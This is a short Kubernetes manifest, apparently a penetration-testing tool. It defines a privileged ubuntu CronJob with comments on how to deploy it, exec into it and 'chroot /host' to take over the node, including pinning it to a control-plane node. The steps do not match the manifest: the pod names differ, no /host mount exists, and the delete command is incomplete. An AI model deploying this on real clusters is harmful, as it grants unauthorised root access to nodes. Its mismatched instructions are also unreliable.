###########################################################
## Deploy: kubectl -n [namespace] apply -f priv-exec.yaml 
## Access: kubectl -n [namespace] exec -it priv-exec -- chroot /host
## Remove: kubectl -n [namespace] delete priv-exec
###########################################################

apiVersion: batch/v1beta1
kind: CronJob
metadata:
  name: priv
  labels:
    app: pentest
spec:
  schedule: "*/1 * * * *"
  concurrencyPolicy: Forbid
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: priv
            image: ubuntu
            securityContext:
              privileged: true
            command: [ "/bin/sh", "-c", "--" ]
            args: [ "while true; do sleep 30; done;" ]
          #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
          restartPolicy: OnFailure